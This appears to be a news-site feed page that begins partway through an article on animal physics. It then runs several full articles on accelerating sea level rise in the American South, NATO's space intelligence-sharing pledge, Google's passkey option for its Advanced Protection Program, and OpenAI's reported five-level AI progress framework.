Small-scale structures are also important for animals’ interaction with water. For many animals, microstructures make the body “superhydrophobic”—capable of blocking the penetration of water. “In wet climates, water droplet shedding can be essential in animals, like flying birds and insects, where weight and stability are crucially important,” note Rieser, of Emory University, and coauthors Chantal Nguyen, Orit Peleg and Calvin Riiska.

Water-blocking surfaces also help animals keep their skins clean. “This self-cleansing mechanism … can be important to help protect the animal from dangers like skin-borne parasites and other infections,” the Annual Review authors explain. And in some cases, removing foreign material from an animal’s surface may be necessary to preserve the surface properties that enhance camouflage.

Animals use physics? Let us count the ways Read More »

in-the-south,-sea-level-rise-accelerates-at-some-of-the-most-extreme-rates-on-earth

In the South, sea level rise accelerates at some of the most extreme rates on Earth

migrating inland —

The surge is startling scientists, amplifying impacts such as hurricane storm surges.

Older man points to the rising tide while standing on a dock.

Enlarge / Steve Salem is a 50-year boat captain who lives on a tributary of the St. Johns River. The rising tides in Jacksonville are testing his intuition.

This article originally appeared on Inside Climate News, a nonprofit, independent news organization that covers climate, energy, and the environment. It is republished with permission. Sign up for their newsletter here

JACKSONVILLE, Fla.—For most of his life, Steve Salem has led an existence closely linked with the rise and fall of the tides.

Salem is a 50-year boat captain who designed and built his 65-foot vessel by hand.

“Me and Noah, we’re related somewhere,” said Salem, 75, whose silver beard evokes Ernest Hemingway.

Salem is familiar with how the sun and moon influence the tides and feels an innate sense for their ebb and flow, although the tides here are beginning to test even his intuition.

He and his wife live in a rust-colored ranch-style house along a tributary of the St. Johns River, Florida’s longest. Before they moved in the house had flooded, in 2017, as Hurricane Irma swirled by. The house flooded again in 2022, when Hurricane Nicole defied his expectations. But Salem believes the house is sturdy and that he can manage the tides, as he always has.

“I’m a water dog to begin with. I’ve always been on the water,” said Salem, who prefers to go by Captain Steve. “I worry about things that I have to do something about. If I can’t do anything about it, then worrying about it is going to do what?”

Across the American South, tides are rising at accelerating rates that are among the most extreme on Earth, constituting a surge that has startled scientists such as Jeff Chanton, professor in the Department of Earth, Ocean and Atmospheric Science at Florida State University.

“It’s pretty shocking,” he said. “You would think it would increase gradually, it would be a gradual thing. But this is like a major shift.”

Worldwide sea levels have climbed since 1900 by some 1.5 millimeters a year, a pace that is unprecedented in at least 3,000 years and generally attributable to melting ice sheets and glaciers and also the expansion of the oceans as their temperatures warm. Since the middle of the 20th century the rate has gained speed, exceeding 3 millimeters a year since 1992.

In the South the pace has quickened further, jumping from about 1.7 millimeters a year at the turn of the 20th century to at least 8.4 millimeters by 2021, according to a 2023 study published in Nature Communications based on tidal gauge records from throughout the region. In Pensacola, a beachy community on the western side of the Florida Panhandle, the rate soared to roughly 11 millimeters a year by the end of 2021.

“I think people just really have no idea what is coming, because we have no way of visualizing that through our own personal experiences, or that of the last 250 years,” said Randall Parkinson, a coastal geologist at Florida International University. “It’s not something where you go, ‘I know what that might look like because I’ve seen that.’ Because we haven’t.

“It’s the same everywhere, from North Carolina all the way down to the Florida Keys and all the way up into Alabama,” he said. “All of these areas are extremely vulnerable.”

The acceleration is poised to amplify impacts such as hurricane storm surges, nuisance flooding and land loss. In recent years the rising tides have coincided with record-breaking hurricane seasons, pushing storm surges higher and farther inland. In 2022 Hurricane Ian, which came ashore in southwest Florida, was the costliest hurricane in state history and third-costliest to date in the United States, after Katrina in 2005 and Harvey in 2017.

“It doesn’t even take a major storm event anymore. You just get these compounding effects,” said Rachel Cleetus, a policy director at the Union for Concerned Scientists, an advocacy group. “All of a sudden you have a much more impactful flooding event, and a lot of the infrastructure, frankly, like the stormwater infrastructure, it’s just not built for this.”

In the South, sea level rise accelerates at some of the most extreme rates on Earth Read More »

nato-allies-pledge-$1-billion-to-promote-sharing-of-space-based-intel

NATO allies pledge $1 billion to promote sharing of space-based intel

Breaking barriers —

Agreement marks the largest investment in space-based capabilities in NATO’s history.

Heads of state pose for a group photo at an event Tuesday celebrating the 75th anniversary of NATO.

Enlarge / Heads of state pose for a group photo at an event Tuesday celebrating the 75th anniversary of NATO.

During their summit in Washington, DC, this week, NATO member states committed more than $1 billion to improve the sharing of intelligence from national and commercial reconnaissance satellites.

The agreement is a further step toward integrating space assets into NATO military commands. It follows the bloc’s adoption of an official space policy in 2019, which recognized space as a fifth war-fighting domain alongside air, land, maritime, and cyberspace. The next step was the formation of the NATO Space Operations Center in 2020 to oversee space support for NATO military operations.

On June 25, NATO announced the establishment of a “space branch” in its Allied Command Transformation, which identifies trends and incorporates emerging capabilities into the alliance’s security strategy.

Breaking down barriers

The new intelligence-sharing agreement was signed on July 9 by representatives from 17 NATO nations, including the United States, to support the Alliance Persistent Surveillance from Space (APSS) program. In a statement, NATO called the agreement “the largest multinational investment in space-based capabilities in NATO’s history.”

The agreement for open sharing of intelligence data comes against the backdrop of NATO’s response to the Russian invasion of Ukraine. Space-based capabilities, including battlefield surveillance and communications, have proven crucial to both sides in the war.

“The ongoing war in Ukraine has further underscored intelligence’s growing dependence on space-based data and assets,” NATO said.

The program will improve NATO’s ability to monitor activities on the ground and at sea with unprecedented accuracy and timeliness, the alliance said in a statement. The 17 parties to the agreement pledged more than $1 billion transition the program into an implementation phase over the next five years. Six of the 17 signatories currently operate or plan to launch their own national reconnaissance satellites, while several more nations are home to companies operating commercial space-based surveillance satellites.

The APSS program won’t involve the development and launch of any NATO spy satellites. Instead, each nation will make efforts to share observations from their own government and commercial satellites.

Luxembourg, one of the smallest NATO member states, set up the APSS program with an initial investment of roughly $18 million (16.5 million euros) in 2023. At the time, NATO called the program a “data-centric initiative” aimed at bringing together intelligence information for easier dissemination among allies and breaking down barriers of secrecy and bureaucracy.

“APSS is not about creating NATO-owned and operated space assets,” officials wrote in the program’s fact sheet. “It will make use of existing and future space assets in allied countries, and connect them together in a NATO virtual constellation called ‘Aquila.'”

Another element of the program involves processing and sharing intelligence information through cloud solutions and technologies. NATO said AI analytical tools will also better manage growing amounts of surveillance data from space, and ensure decision-makers get faster access to time-sensitive observations.

“The APSS initiative may be regarded as a game changer for NATO’s intelligence, surveillance and reconnaissance. It will largely contribute to build NATO’s readiness and reduce its dependency on other intelligence and surveillance capabilities,” said Ludwig Decamps, general manager of the NATO Communications and Information Agency.

NATO allies pledge $1 billion to promote sharing of space-based intel Read More »

google-makes-it-easier-for-users-to-switch-on-advanced-account-protection

Google makes it easier for users to switch on advanced account protection

APP MADE EASIER —

The strict requirement for two physical keys is now eased when passkeys are used.

Google makes it easier for users to switch on advanced account protection

Getty Images

Google is making it easier for people to lock down their accounts with strong multifactor authentication by adding the option to store secure cryptographic keys in the form of passkeys rather than on physical token devices.

Google’s Advanced Protection Program, introduced in 2017, requires the strongest form of multifactor authentication (MFA). Whereas many forms of MFA rely on one-time passcodes sent through SMS or emails or generated by authenticator apps, accounts enrolled in advanced protection require MFA based on cryptographic keys stored on a secure physical device. Unlike one-time passcodes, security keys stored on physical devices are immune to credential phishing and can’t be copied or sniffed.

Democratizing APP

APP, short for Advanced Protection Program, requires the key to be accompanied by a password whenever a user logs into an account on a new device. The protection prevents the types of account takeovers that allowed Kremlin-backed hackers to access the Gmail accounts of Democratic officials in 2016 and go on to leak stolen emails to interfere with the presidential election that year.

Until now, Google required people to have two physical security keys to enroll in APP. Now, the company is allowing people to instead use two passkeys or one passkey and one physical token. Those seeking further security can enroll using as many keys as they want.

“We’re expanding the aperture so people have more choice in how they enroll in this program,” Shuvo Chatterjee, the project lead for APP, told Ars. He said the move comes in response to comments Google has received from some users who either couldn’t afford to buy the physical keys or lived or worked in regions where they’re not available.

As always, users must still have two keys to enroll to prevent being locked out of accounts if one of them is lost or broken. While lockouts are always a problem, they can be much worse for APP users because the recovery process is much more rigorous and takes much longer than for accounts not enrolled in the program.

Passkeys are the creation of the FIDO Alliance, a cross-industry group comprised of hundreds of companies. They’re stored locally on a device and can also be stored in the same type of hardware token storing MFA keys. Passkeys can’t be extracted from the device and require either a PIN or a scan of a fingerprint or face. They provide two factors of authentication: something the user knows—the underlying password used when the passkey was first generated—and something the user has—in the form of the device storing the passkey.

Of course, the relaxed requirements only go so far since users still must have two devices. But by expanding the types of devices needed,  APP becomes more accessible since many people already have a phone and computer, Chatterjee said.

“If you’re in a place where you can’t get security keys, it’s more convenient,” he explained. “This is a step toward democratizing how much access [users] get to this highest security tier Google offers.”

Despite the increased scrutiny involved in the recovery process for APP accounts, Google is renewing its recommendation that users provide a phone number and email address as backup.

“The most resilient thing to do is have multiple things on file, so if you lose that security key or the key blows up, you have a way to get back into your account,” Chatterjee said. He’s not providing the “secret sauce” details about how the process works, but he said it involves “tons of signals we look at to figure out what’s really happening.

“Even if you do have a recovery phone, a recovery phone by itself isn’t going to get you access to your account,” he said. “So if you get SIM swapped, it doesn’t mean someone gets access to your account. It’s a combination of various factors. It’s the summation of that that will help you on your path to recovery.”

Google users can enroll in APP by visiting this link.

Google makes it easier for users to switch on advanced account protection Read More »

openai-reportedly-nears-breakthrough-with-“reasoning”-ai,-reveals-progress-framework

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework

studies in hype-otheticals —

Five-level AI classification system probably best seen as a marketing exercise.

Illustration of a robot with many arms.

OpenAI recently unveiled a five-tier system to gauge its advancement toward developing artificial general intelligence (AGI), according to an OpenAI spokesperson who spoke with Bloomberg. The company shared this new classification system on Tuesday with employees during an all-hands meeting, aiming to provide a clear framework for understanding AI advancement. However, the system describes hypothetical technology that does not yet exist and is possibly best interpreted as a marketing move to garner investment dollars.

OpenAI has previously stated that AGI—a nebulous term for a hypothetical concept that means an AI system that can perform novel tasks like a human without specialized training—is currently the primary goal of the company. The pursuit of technology that can replace humans at most intellectual work drives most of the enduring hype over the firm, even though such a technology would likely be wildly disruptive to society.

OpenAI CEO Sam Altman has previously stated his belief that AGI could be achieved within this decade, and a large part of the CEO’s public messaging has been related to how the company (and society in general) might handle the disruption that AGI may bring. Along those lines, a ranking system to communicate AI milestones achieved internally on the path to AGI makes sense.

OpenAI’s five levels—which it plans to share with investors—range from current AI capabilities to systems that could potentially manage entire organizations. The company believes its technology (such as GPT-4o that powers ChatGPT) currently sits at Level 1, which encompasses AI that can engage in conversational interactions. However, OpenAI executives reportedly told staff they’re on the verge of reaching Level 2, dubbed “Reasoners.”

Bloomberg lists OpenAI’s five “Stages of Artificial Intelligence” as follows:

  • Level 1: Chatbots, AI with conversational language
  • Level 2: Reasoners, human-level problem solving
  • Level 3: Agents, systems that can take actions
  • Level 4: Innovators, AI that can aid in invention
  • Level 5: Organizations, AI that can do the work of an organization

A Level 2 AI system would reportedly be capable of basic problem-solving on par with a human who holds a doctorate degree but lacks access to external tools. During the all-hands meeting, OpenAI leadership reportedly demonstrated a research project using their GPT-4 model that the researchers believe shows signs of approaching this human-like reasoning ability, according to someone familiar with the discussion who spoke with Bloomberg.

The upper levels of OpenAI’s classification describe increasingly potent hypothetical AI capabilities. Level 3 “Agents” could work autonomously on tasks for days. Level 4 systems would generate novel innovations. The pinnacle, Level 5, envisions AI managing entire organizations.

This classification system is still a work in progress. OpenAI plans to gather feedback from employees, investors, and board members, potentially refining the levels over time.

Ars Technica asked OpenAI about the ranking system and the accuracy of the Bloomberg report, and a company spokesperson said they had “nothing to add.”

The problem with ranking AI capabilities

OpenAI isn’t alone in attempting to quantify levels of AI capabilities. As Bloomberg notes, OpenAI’s system feels similar to levels of autonomous driving mapped out by automakers. And in November 2023, researchers at Google DeepMind proposed their own five-level framework for assessing AI advancement, showing that other AI labs have also been trying to figure out how to rank things that don’t yet exist.

OpenAI’s classification system also somewhat resembles Anthropic’s “AI Safety Levels” (ASLs) first published by the maker of the Claude AI assistant in September 2023. Both systems aim to categorize AI capabilities, though they focus on different aspects. Anthropic’s ASLs are more explicitly focused on safety and catastrophic risks (such as ASL-2, which refers to “systems that show early signs of dangerous capabilities”), while OpenAI’s levels track general capabilities.

However, any AI classification system raises questions about whether it’s possible to meaningfully quantify AI progress and what constitutes an advancement (or even what constitutes a “dangerous” AI system, as in the case of Anthropic). The tech industry so far has a history of overpromising AI capabilities, and linear progression models like OpenAI’s potentially risk fueling unrealistic expectations.

There is currently no consensus in the AI research community on how to measure progress toward AGI or even if AGI is a well-defined or achievable goal. As such, OpenAI’s five-tier system should likely be viewed as a communications tool to entice investors that shows the company’s aspirational goals rather than a scientific or even technical measurement of progress.

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework Read More »